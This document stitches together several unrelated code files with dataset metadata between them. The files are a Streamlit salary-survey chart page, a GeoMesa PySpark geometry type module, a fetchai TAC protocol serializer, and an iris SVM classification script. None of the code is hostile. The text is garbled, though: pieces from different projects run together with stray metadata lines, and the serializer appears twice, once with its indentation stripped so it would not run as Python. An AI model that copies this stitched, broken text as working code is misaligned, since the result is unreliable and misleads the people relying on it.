    survey=survey.rename({'ConvertedComp':'Salary'},axis=1)
    survey=survey[survey['Salary'].notnull()]
    survey=survey.dropna()
    survey=survey.drop('Employment',axis=1)
    # Bucket countries with fewer than 400 responses into 'Other'.
    country_map=shorten_categories(survey.Country.value_counts(),400)
    survey['Country']=survey['Country'].map(country_map)
    survey=survey[survey['Salary'] <=250000]
    survey=survey[survey['Salary'] >=10000]
    # NOTE(review): Salary is numeric at this point, so comparing it to the
    # string 'Others' never filters any row -- confirm the original intent.
    survey=survey[survey['Salary'] !='Others']
    survey['YearsCodePro']= survey['YearsCodePro'].apply(clean_experience)
    survey['EdLevel']= survey['EdLevel'].apply(clean_education)
    return survey
survey=load_data()  # module-level dataset shared by the page-rendering functions
def show_explore_page():
    """Render the Streamlit 'explore' page: a country pie chart plus
    mean-salary bar/line charts, computed from the module-level ``survey``."""
    st.title("Data Scientist Salary prediction")
    st.write("""
### Stack Overflow Developer Survey 2022
# """
    )
    data=survey['Country'].value_counts()
    fig1,ax1=plt.subplots()
    ax1.pie(data,labels=data.index,shadow=True,startangle=90)
    # Bug fix: the original did `ax1.axis=('equal')`, which *assigns over*
    # the Axes.axis method instead of calling it. Call it so the pie is
    # drawn with an equal aspect ratio (a circle).
    ax1.axis('equal')
    st.write("""#### Number of Data from different countries""")
    st.pyplot(fig1)
    st.write(
        """
#### Mean Salary based on country
"""
    )
    data=survey.groupby(['Country']) ["Salary"].mean().sort_values(ascending=True)
    st.bar_chart(data)
    st.write(
        """
#### Mean Salary Based on Experience
"""
    )
    data=survey.groupby(['YearsCodePro'])['Salary'].mean().sort_values(ascending=True)
    st.line_chart(data)
|
en
| 0.813385
|
### Stack Overflow Developer Survey 2022
# #Equal aspect ratio ensures that pie is drawn as a circle #### Number of Data from different countries #### Mean Salary based on country #### Mean Salary Based on Experience
| 3.391448
| 3
|
geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
|
khobbs-ccri/geomesa
| 1,197
|
6628141
|
<filename>geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
from pyspark.sql.types import UserDefinedType, StructField, BinaryType, StructType
from shapely import wkb
from shapely.geometry import LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon
from shapely.geometry.base import BaseGeometry
from shapely.geometry.collection import GeometryCollection
class ShapelyGeometryUDT(UserDefinedType):
    """Base PySpark UDT that stores a Shapely geometry as one WKB binary column."""
    @classmethod
    def sqlType(cls):
        # Catalyst schema: a single nullable binary field holding WKB bytes.
        return StructType([StructField("wkb", BinaryType(), True)])
    @classmethod
    def module(cls):
        # Python module PySpark re-imports to locate this UDT on deserialization.
        return 'geomesa_pyspark.types'
    @classmethod
    def scalaUDT(cls):
        # Fully-qualified Scala counterpart, derived from the Python class name
        # (e.g. PointUDT -> org.apache.spark.sql.jts.PointUDT).
        return 'org.apache.spark.sql.jts.' + cls.__name__
    def serialize(self, obj):
        """Convert a Shapely geometry into the single-field row representation."""
        return [_serialize_to_wkb(obj)]
    def deserialize(self, datum):
        """Rebuild a Shapely geometry from the single-field row representation."""
        return _deserialize_from_wkb(datum[0])
# One concrete UDT per Shapely geometry type; each maps to its Scala
# counterpart purely via the class name (see ShapelyGeometryUDT.scalaUDT).
class PointUDT(ShapelyGeometryUDT):
    pass
class LineStringUDT(ShapelyGeometryUDT):
    pass
class PolygonUDT(ShapelyGeometryUDT):
    pass
class MultiPointUDT(ShapelyGeometryUDT):
    pass
class MultiLineStringUDT(ShapelyGeometryUDT):
    pass
class MultiPolygonUDT(ShapelyGeometryUDT):
    pass
class GeometryUDT(ShapelyGeometryUDT):
    pass
class GeometryCollectionUDT(ShapelyGeometryUDT):
    pass
def _serialize_to_wkb(data):
    """Return the WKB bytes of *data* as a bytearray, or None for non-geometries."""
    if not isinstance(data, BaseGeometry):
        return None
    # bytearray(...) keeps Python 2 compatibility.
    return bytearray(data.wkb)
def _deserialize_from_wkb(data):
    """Parse WKB bytes back into a Shapely geometry; None passes through."""
    # bytes(...) keeps Python 2 compatibility.
    return None if data is None else wkb.loads(bytes(data))
_deserialize_from_wkb.__safe_for_unpickling__ = True
# Inject PySpark UDT support into Shapely's geometry types: Spark discovers
# a type's UDT through the __UDT__ attribute, so setting it here lets these
# geometries flow through DataFrames transparently.
Point.__UDT__ = PointUDT()
MultiPoint.__UDT__ = MultiPointUDT()
LineString.__UDT__ = LineStringUDT()
MultiLineString.__UDT__ = MultiLineStringUDT()
Polygon.__UDT__ = PolygonUDT()
MultiPolygon.__UDT__ = MultiPolygonUDT()
BaseGeometry.__UDT__ = GeometryUDT()
GeometryCollection.__UDT__ = GeometryCollectionUDT()
|
<filename>geomesa-spark/geomesa_pyspark/src/main/python/geomesa_pyspark/types.py
from pyspark.sql.types import UserDefinedType, StructField, BinaryType, StructType
from shapely import wkb
from shapely.geometry import LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon
from shapely.geometry.base import BaseGeometry
from shapely.geometry.collection import GeometryCollection
class ShapelyGeometryUDT(UserDefinedType):
@classmethod
def sqlType(cls):
return StructType([StructField("wkb", BinaryType(), True)])
@classmethod
def module(cls):
return 'geomesa_pyspark.types'
@classmethod
def scalaUDT(cls):
return 'org.apache.spark.sql.jts.' + cls.__name__
def serialize(self, obj):
return [_serialize_to_wkb(obj)]
def deserialize(self, datum):
return _deserialize_from_wkb(datum[0])
class PointUDT(ShapelyGeometryUDT):
pass
class LineStringUDT(ShapelyGeometryUDT):
pass
class PolygonUDT(ShapelyGeometryUDT):
pass
class MultiPointUDT(ShapelyGeometryUDT):
pass
class MultiLineStringUDT(ShapelyGeometryUDT):
pass
class MultiPolygonUDT(ShapelyGeometryUDT):
pass
class GeometryUDT(ShapelyGeometryUDT):
pass
class GeometryCollectionUDT(ShapelyGeometryUDT):
pass
def _serialize_to_wkb(data):
if isinstance(data, BaseGeometry):
return bytearray(data.wkb) # bytearray(...) needed for Python 2 compat.
return None
def _deserialize_from_wkb(data):
if data is None:
return None
return wkb.loads(bytes(data)) # bytes(...) needed for Python 2 compat.
_deserialize_from_wkb.__safe_for_unpickling__ = True
# inject some PySpark constructs into Shapely's geometry types
Point.__UDT__ = PointUDT()
MultiPoint.__UDT__ = MultiPointUDT()
LineString.__UDT__ = LineStringUDT()
MultiLineString.__UDT__ = MultiLineStringUDT()
Polygon.__UDT__ = PolygonUDT()
MultiPolygon.__UDT__ = MultiPolygonUDT()
BaseGeometry.__UDT__ = GeometryUDT()
GeometryCollection.__UDT__ = GeometryCollectionUDT()
|
en
| 0.630305
|
# bytearray(...) needed for Python 2 compat. # bytes(...) needed for Python 2 compat. # inject some PySpark constructs into Shapely's geometry types
| 2.311213
| 2
|
packages/fetchai/protocols/tac/serialization.py
|
valory-xyz/agents-aea
| 28
|
6628142
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization module for tac protocol."""
# pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin
from typing import Any, Dict, cast
from aea.mail.base_pb2 import DialogueMessage
from aea.mail.base_pb2 import Message as ProtobufMessage
from aea.protocols.base import Message, Serializer
from packages.fetchai.protocols.tac import tac_pb2
from packages.fetchai.protocols.tac.custom_types import ErrorCode
from packages.fetchai.protocols.tac.message import TacMessage
class TacSerializer(Serializer):
    """Serialization for the 'tac' protocol."""
    @staticmethod
    def encode(msg: Message) -> bytes:
        """
        Encode a 'Tac' message into bytes.
        :param msg: the message object.
        :return: the bytes.
        """
        msg = cast(TacMessage, msg)
        message_pb = ProtobufMessage()
        dialogue_message_pb = DialogueMessage()
        tac_msg = tac_pb2.TacMessage()
        # Dialogue envelope: message id, (starter, responder) references, target.
        dialogue_message_pb.message_id = msg.message_id
        dialogue_reference = msg.dialogue_reference
        dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
        dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
        dialogue_message_pb.target = msg.target
        performative_id = msg.performative
        # One branch per performative: copy the message's fields into the
        # matching protobuf sub-message.
        if performative_id == TacMessage.Performative.REGISTER:
            performative = tac_pb2.TacMessage.Register_Performative()  # type: ignore
            agent_name = msg.agent_name
            performative.agent_name = agent_name
            tac_msg.register.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.UNREGISTER:
            performative = tac_pb2.TacMessage.Unregister_Performative()  # type: ignore
            tac_msg.unregister.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TRANSACTION:
            performative = tac_pb2.TacMessage.Transaction_Performative()  # type: ignore
            transaction_id = msg.transaction_id
            performative.transaction_id = transaction_id
            ledger_id = msg.ledger_id
            performative.ledger_id = ledger_id
            sender_address = msg.sender_address
            performative.sender_address = sender_address
            counterparty_address = msg.counterparty_address
            performative.counterparty_address = counterparty_address
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            fee_by_currency_id = msg.fee_by_currency_id
            performative.fee_by_currency_id.update(fee_by_currency_id)
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            nonce = msg.nonce
            performative.nonce = nonce
            sender_signature = msg.sender_signature
            performative.sender_signature = sender_signature
            counterparty_signature = msg.counterparty_signature
            performative.counterparty_signature = counterparty_signature
            tac_msg.transaction.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.CANCELLED:
            performative = tac_pb2.TacMessage.Cancelled_Performative()  # type: ignore
            tac_msg.cancelled.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.GAME_DATA:
            performative = tac_pb2.TacMessage.Game_Data_Performative()  # type: ignore
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            exchange_params_by_currency_id = msg.exchange_params_by_currency_id
            performative.exchange_params_by_currency_id.update(
                exchange_params_by_currency_id
            )
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            utility_params_by_good_id = msg.utility_params_by_good_id
            performative.utility_params_by_good_id.update(utility_params_by_good_id)
            fee_by_currency_id = msg.fee_by_currency_id
            performative.fee_by_currency_id.update(fee_by_currency_id)
            agent_addr_to_name = msg.agent_addr_to_name
            performative.agent_addr_to_name.update(agent_addr_to_name)
            currency_id_to_name = msg.currency_id_to_name
            performative.currency_id_to_name.update(currency_id_to_name)
            good_id_to_name = msg.good_id_to_name
            performative.good_id_to_name.update(good_id_to_name)
            version_id = msg.version_id
            performative.version_id = version_id
            if msg.is_set("info"):
                # 'info' is optional: the *_is_set flag distinguishes
                # "absent" from "present but empty".
                performative.info_is_set = True
                info = msg.info
                performative.info.update(info)
            tac_msg.game_data.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
            performative = tac_pb2.TacMessage.Transaction_Confirmation_Performative()  # type: ignore
            transaction_id = msg.transaction_id
            performative.transaction_id = transaction_id
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            tac_msg.transaction_confirmation.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TAC_ERROR:
            performative = tac_pb2.TacMessage.Tac_Error_Performative()  # type: ignore
            error_code = msg.error_code
            ErrorCode.encode(performative.error_code, error_code)
            if msg.is_set("info"):
                performative.info_is_set = True
                info = msg.info
                performative.info.update(info)
            tac_msg.tac_error.CopyFrom(performative)
        else:
            raise ValueError("Performative not valid: {}".format(performative_id))
        # Nest the protocol payload inside the dialogue envelope and serialize.
        dialogue_message_pb.content = tac_msg.SerializeToString()
        message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
        message_bytes = message_pb.SerializeToString()
        return message_bytes
    @staticmethod
    def decode(obj: bytes) -> Message:
        """
        Decode bytes into a 'Tac' message.
        :param obj: the bytes object.
        :return: the 'Tac' message.
        """
        message_pb = ProtobufMessage()
        tac_pb = tac_pb2.TacMessage()
        message_pb.ParseFromString(obj)
        # Unpack the dialogue envelope first ...
        message_id = message_pb.dialogue_message.message_id
        dialogue_reference = (
            message_pb.dialogue_message.dialogue_starter_reference,
            message_pb.dialogue_message.dialogue_responder_reference,
        )
        target = message_pb.dialogue_message.target
        # ... then the protocol payload it carries.
        tac_pb.ParseFromString(message_pb.dialogue_message.content)
        performative = tac_pb.WhichOneof("performative")
        performative_id = TacMessage.Performative(str(performative))
        performative_content = dict()  # type: Dict[str, Any]
        # Mirror of encode(): extract the fields of whichever performative
        # sub-message the oneof carries.
        if performative_id == TacMessage.Performative.REGISTER:
            agent_name = tac_pb.register.agent_name
            performative_content["agent_name"] = agent_name
        elif performative_id == TacMessage.Performative.UNREGISTER:
            pass
        elif performative_id == TacMessage.Performative.TRANSACTION:
            transaction_id = tac_pb.transaction.transaction_id
            performative_content["transaction_id"] = transaction_id
            ledger_id = tac_pb.transaction.ledger_id
            performative_content["ledger_id"] = ledger_id
            sender_address = tac_pb.transaction.sender_address
            performative_content["sender_address"] = sender_address
            counterparty_address = tac_pb.transaction.counterparty_address
            performative_content["counterparty_address"] = counterparty_address
            amount_by_currency_id = tac_pb.transaction.amount_by_currency_id
            amount_by_currency_id_dict = dict(amount_by_currency_id)
            performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
            fee_by_currency_id = tac_pb.transaction.fee_by_currency_id
            fee_by_currency_id_dict = dict(fee_by_currency_id)
            performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
            quantities_by_good_id = tac_pb.transaction.quantities_by_good_id
            quantities_by_good_id_dict = dict(quantities_by_good_id)
            performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
            nonce = tac_pb.transaction.nonce
            performative_content["nonce"] = nonce
            sender_signature = tac_pb.transaction.sender_signature
            performative_content["sender_signature"] = sender_signature
            counterparty_signature = tac_pb.transaction.counterparty_signature
            performative_content["counterparty_signature"] = counterparty_signature
        elif performative_id == TacMessage.Performative.CANCELLED:
            pass
        elif performative_id == TacMessage.Performative.GAME_DATA:
            amount_by_currency_id = tac_pb.game_data.amount_by_currency_id
            amount_by_currency_id_dict = dict(amount_by_currency_id)
            performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
            exchange_params_by_currency_id = (
                tac_pb.game_data.exchange_params_by_currency_id
            )
            exchange_params_by_currency_id_dict = dict(exchange_params_by_currency_id)
            performative_content[
                "exchange_params_by_currency_id"
            ] = exchange_params_by_currency_id_dict
            quantities_by_good_id = tac_pb.game_data.quantities_by_good_id
            quantities_by_good_id_dict = dict(quantities_by_good_id)
            performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
            utility_params_by_good_id = tac_pb.game_data.utility_params_by_good_id
            utility_params_by_good_id_dict = dict(utility_params_by_good_id)
            performative_content[
                "utility_params_by_good_id"
            ] = utility_params_by_good_id_dict
            fee_by_currency_id = tac_pb.game_data.fee_by_currency_id
            fee_by_currency_id_dict = dict(fee_by_currency_id)
            performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
            agent_addr_to_name = tac_pb.game_data.agent_addr_to_name
            agent_addr_to_name_dict = dict(agent_addr_to_name)
            performative_content["agent_addr_to_name"] = agent_addr_to_name_dict
            currency_id_to_name = tac_pb.game_data.currency_id_to_name
            currency_id_to_name_dict = dict(currency_id_to_name)
            performative_content["currency_id_to_name"] = currency_id_to_name_dict
            good_id_to_name = tac_pb.game_data.good_id_to_name
            good_id_to_name_dict = dict(good_id_to_name)
            performative_content["good_id_to_name"] = good_id_to_name_dict
            version_id = tac_pb.game_data.version_id
            performative_content["version_id"] = version_id
            if tac_pb.game_data.info_is_set:
                info = tac_pb.game_data.info
                info_dict = dict(info)
                performative_content["info"] = info_dict
        elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
            transaction_id = tac_pb.transaction_confirmation.transaction_id
            performative_content["transaction_id"] = transaction_id
            amount_by_currency_id = (
                tac_pb.transaction_confirmation.amount_by_currency_id
            )
            amount_by_currency_id_dict = dict(amount_by_currency_id)
            performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
            quantities_by_good_id = (
                tac_pb.transaction_confirmation.quantities_by_good_id
            )
            quantities_by_good_id_dict = dict(quantities_by_good_id)
            performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
        elif performative_id == TacMessage.Performative.TAC_ERROR:
            pb2_error_code = tac_pb.tac_error.error_code
            error_code = ErrorCode.decode(pb2_error_code)
            performative_content["error_code"] = error_code
            if tac_pb.tac_error.info_is_set:
                info = tac_pb.tac_error.info
                info_dict = dict(info)
                performative_content["info"] = info_dict
        else:
            raise ValueError("Performative not valid: {}.".format(performative_id))
        return TacMessage(
            message_id=message_id,
            dialogue_reference=dialogue_reference,
            target=target,
            performative=performative,
            **performative_content
        )
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization module for tac protocol."""
# pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin
from typing import Any, Dict, cast
from aea.mail.base_pb2 import DialogueMessage
from aea.mail.base_pb2 import Message as ProtobufMessage
from aea.protocols.base import Message, Serializer
from packages.fetchai.protocols.tac import tac_pb2
from packages.fetchai.protocols.tac.custom_types import ErrorCode
from packages.fetchai.protocols.tac.message import TacMessage
class TacSerializer(Serializer):
"""Serialization for the 'tac' protocol."""
    @staticmethod
    def encode(msg: Message) -> bytes:
        """
        Encode a 'Tac' message into bytes.
        :param msg: the message object.
        :return: the bytes.
        """
        msg = cast(TacMessage, msg)
        message_pb = ProtobufMessage()
        dialogue_message_pb = DialogueMessage()
        tac_msg = tac_pb2.TacMessage()
        # Dialogue envelope: message id, (starter, responder) references, target.
        dialogue_message_pb.message_id = msg.message_id
        dialogue_reference = msg.dialogue_reference
        dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
        dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
        dialogue_message_pb.target = msg.target
        performative_id = msg.performative
        # One branch per performative: copy the message's fields into the
        # matching protobuf sub-message.
        if performative_id == TacMessage.Performative.REGISTER:
            performative = tac_pb2.TacMessage.Register_Performative()  # type: ignore
            agent_name = msg.agent_name
            performative.agent_name = agent_name
            tac_msg.register.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.UNREGISTER:
            performative = tac_pb2.TacMessage.Unregister_Performative()  # type: ignore
            tac_msg.unregister.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TRANSACTION:
            performative = tac_pb2.TacMessage.Transaction_Performative()  # type: ignore
            transaction_id = msg.transaction_id
            performative.transaction_id = transaction_id
            ledger_id = msg.ledger_id
            performative.ledger_id = ledger_id
            sender_address = msg.sender_address
            performative.sender_address = sender_address
            counterparty_address = msg.counterparty_address
            performative.counterparty_address = counterparty_address
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            fee_by_currency_id = msg.fee_by_currency_id
            performative.fee_by_currency_id.update(fee_by_currency_id)
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            nonce = msg.nonce
            performative.nonce = nonce
            sender_signature = msg.sender_signature
            performative.sender_signature = sender_signature
            counterparty_signature = msg.counterparty_signature
            performative.counterparty_signature = counterparty_signature
            tac_msg.transaction.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.CANCELLED:
            performative = tac_pb2.TacMessage.Cancelled_Performative()  # type: ignore
            tac_msg.cancelled.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.GAME_DATA:
            performative = tac_pb2.TacMessage.Game_Data_Performative()  # type: ignore
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            exchange_params_by_currency_id = msg.exchange_params_by_currency_id
            performative.exchange_params_by_currency_id.update(
                exchange_params_by_currency_id
            )
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            utility_params_by_good_id = msg.utility_params_by_good_id
            performative.utility_params_by_good_id.update(utility_params_by_good_id)
            fee_by_currency_id = msg.fee_by_currency_id
            performative.fee_by_currency_id.update(fee_by_currency_id)
            agent_addr_to_name = msg.agent_addr_to_name
            performative.agent_addr_to_name.update(agent_addr_to_name)
            currency_id_to_name = msg.currency_id_to_name
            performative.currency_id_to_name.update(currency_id_to_name)
            good_id_to_name = msg.good_id_to_name
            performative.good_id_to_name.update(good_id_to_name)
            version_id = msg.version_id
            performative.version_id = version_id
            if msg.is_set("info"):
                # 'info' is optional: the *_is_set flag distinguishes
                # "absent" from "present but empty".
                performative.info_is_set = True
                info = msg.info
                performative.info.update(info)
            tac_msg.game_data.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
            performative = tac_pb2.TacMessage.Transaction_Confirmation_Performative()  # type: ignore
            transaction_id = msg.transaction_id
            performative.transaction_id = transaction_id
            amount_by_currency_id = msg.amount_by_currency_id
            performative.amount_by_currency_id.update(amount_by_currency_id)
            quantities_by_good_id = msg.quantities_by_good_id
            performative.quantities_by_good_id.update(quantities_by_good_id)
            tac_msg.transaction_confirmation.CopyFrom(performative)
        elif performative_id == TacMessage.Performative.TAC_ERROR:
            performative = tac_pb2.TacMessage.Tac_Error_Performative()  # type: ignore
            error_code = msg.error_code
            ErrorCode.encode(performative.error_code, error_code)
            if msg.is_set("info"):
                performative.info_is_set = True
                info = msg.info
                performative.info.update(info)
            tac_msg.tac_error.CopyFrom(performative)
        else:
            raise ValueError("Performative not valid: {}".format(performative_id))
        # Nest the protocol payload inside the dialogue envelope and serialize.
        dialogue_message_pb.content = tac_msg.SerializeToString()
        message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
        message_bytes = message_pb.SerializeToString()
        return message_bytes
@staticmethod
def decode(obj: bytes) -> Message:
"""
Decode bytes into a 'Tac' message.
:param obj: the bytes object.
:return: the 'Tac' message.
"""
message_pb = ProtobufMessage()
tac_pb = tac_pb2.TacMessage()
message_pb.ParseFromString(obj)
message_id = message_pb.dialogue_message.message_id
dialogue_reference = (
message_pb.dialogue_message.dialogue_starter_reference,
message_pb.dialogue_message.dialogue_responder_reference,
)
target = message_pb.dialogue_message.target
tac_pb.ParseFromString(message_pb.dialogue_message.content)
performative = tac_pb.WhichOneof("performative")
performative_id = TacMessage.Performative(str(performative))
performative_content = dict() # type: Dict[str, Any]
if performative_id == TacMessage.Performative.REGISTER:
agent_name = tac_pb.register.agent_name
performative_content["agent_name"] = agent_name
elif performative_id == TacMessage.Performative.UNREGISTER:
pass
elif performative_id == TacMessage.Performative.TRANSACTION:
transaction_id = tac_pb.transaction.transaction_id
performative_content["transaction_id"] = transaction_id
ledger_id = tac_pb.transaction.ledger_id
performative_content["ledger_id"] = ledger_id
sender_address = tac_pb.transaction.sender_address
performative_content["sender_address"] = sender_address
counterparty_address = tac_pb.transaction.counterparty_address
performative_content["counterparty_address"] = counterparty_address
amount_by_currency_id = tac_pb.transaction.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
fee_by_currency_id = tac_pb.transaction.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
quantities_by_good_id = tac_pb.transaction.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
nonce = tac_pb.transaction.nonce
performative_content["nonce"] = nonce
sender_signature = tac_pb.transaction.sender_signature
performative_content["sender_signature"] = sender_signature
counterparty_signature = tac_pb.transaction.counterparty_signature
performative_content["counterparty_signature"] = counterparty_signature
elif performative_id == TacMessage.Performative.CANCELLED:
pass
elif performative_id == TacMessage.Performative.GAME_DATA:
amount_by_currency_id = tac_pb.game_data.amount_by_currency_id
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
exchange_params_by_currency_id = (
tac_pb.game_data.exchange_params_by_currency_id
)
exchange_params_by_currency_id_dict = dict(exchange_params_by_currency_id)
performative_content[
"exchange_params_by_currency_id"
] = exchange_params_by_currency_id_dict
quantities_by_good_id = tac_pb.game_data.quantities_by_good_id
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
utility_params_by_good_id = tac_pb.game_data.utility_params_by_good_id
utility_params_by_good_id_dict = dict(utility_params_by_good_id)
performative_content[
"utility_params_by_good_id"
] = utility_params_by_good_id_dict
fee_by_currency_id = tac_pb.game_data.fee_by_currency_id
fee_by_currency_id_dict = dict(fee_by_currency_id)
performative_content["fee_by_currency_id"] = fee_by_currency_id_dict
agent_addr_to_name = tac_pb.game_data.agent_addr_to_name
agent_addr_to_name_dict = dict(agent_addr_to_name)
performative_content["agent_addr_to_name"] = agent_addr_to_name_dict
currency_id_to_name = tac_pb.game_data.currency_id_to_name
currency_id_to_name_dict = dict(currency_id_to_name)
performative_content["currency_id_to_name"] = currency_id_to_name_dict
good_id_to_name = tac_pb.game_data.good_id_to_name
good_id_to_name_dict = dict(good_id_to_name)
performative_content["good_id_to_name"] = good_id_to_name_dict
version_id = tac_pb.game_data.version_id
performative_content["version_id"] = version_id
if tac_pb.game_data.info_is_set:
info = tac_pb.game_data.info
info_dict = dict(info)
performative_content["info"] = info_dict
elif performative_id == TacMessage.Performative.TRANSACTION_CONFIRMATION:
transaction_id = tac_pb.transaction_confirmation.transaction_id
performative_content["transaction_id"] = transaction_id
amount_by_currency_id = (
tac_pb.transaction_confirmation.amount_by_currency_id
)
amount_by_currency_id_dict = dict(amount_by_currency_id)
performative_content["amount_by_currency_id"] = amount_by_currency_id_dict
quantities_by_good_id = (
tac_pb.transaction_confirmation.quantities_by_good_id
)
quantities_by_good_id_dict = dict(quantities_by_good_id)
performative_content["quantities_by_good_id"] = quantities_by_good_id_dict
elif performative_id == TacMessage.Performative.TAC_ERROR:
pb2_error_code = tac_pb.tac_error.error_code
error_code = ErrorCode.decode(pb2_error_code)
performative_content["error_code"] = error_code
if tac_pb.tac_error.info_is_set:
info = tac_pb.tac_error.info
info_dict = dict(info)
performative_content["info"] = info_dict
else:
raise ValueError("Performative not valid: {}.".format(performative_id))
return TacMessage(
message_id=message_id,
dialogue_reference=dialogue_reference,
target=target,
performative=performative,
**performative_content
)
|
en
| 0.633095
|
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2022 fetchai # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ Serialization module for tac protocol. # pylint: disable=too-many-statements,too-many-locals,no-member,too-few-public-methods,redefined-builtin Serialization for the 'tac' protocol. Encode a 'Tac' message into bytes. :param msg: the message object. :return: the bytes. # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore # type: ignore Decode bytes into a 'Tac' message. :param obj: the bytes object. :return: the 'Tac' message. # type: Dict[str, Any]
| 1.555065
| 2
|
Assignment2(SVM)/SVM.py
|
jack17529/MLPR
| 0
|
6628143
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import accuracy_score
from matplotlib import pyplot as plt
#from sklearn import cross_validation
# get the data
iris = load_iris()
data0 = iris.data
labels0 = iris.target
(n,p) = data0.shape
#train test split.
xtrain,xtest,ytrain,ytest = train_test_split(data0,labels0,test_size=0.3, random_state=21)
# rbf kernel.
rbfn = svm.SVC(C=10,kernel='rbf',gamma=0.001)
rbfn.fit(xtrain,ytrain)
pred_rbf=rbfn.predict(xtest)
acc_rbf = accuracy_score(ytest, pred_rbf)
print("Accuracy Score of Kernel=rbf is ",acc_rbf)
# poly kernel
quad = svm.SVC(C=10.0,kernel='poly',degree=2,gamma='auto')
quad.fit(xtrain,ytrain)
pred_quad=quad.predict(xtest)
acc_quad=accuracy_score(ytest,pred_quad)
print("Accuracy Score of Kernel=poly is ",acc_quad)
# sigmoid kernel
sigm = svm.SVC(C=10.0, kernel='sigmoid', gamma=0.001)
sigm.fit(xtrain, ytrain)
pred_sigmoid = sigm.predict(xtest)
acc_sigmoid = accuracy_score(ytest, pred_sigmoid)
print("Accuracy Score of Kernel=sigmoid is ",acc_sigmoid)
#plotting graph
results = []
results.append(accuracy_score(ytest, pred_rbf))
results.append(accuracy_score(ytest, pred_quad))
results.append(accuracy_score(ytest, pred_sigmoid))
label = ['rbf','quad','sigmoid']
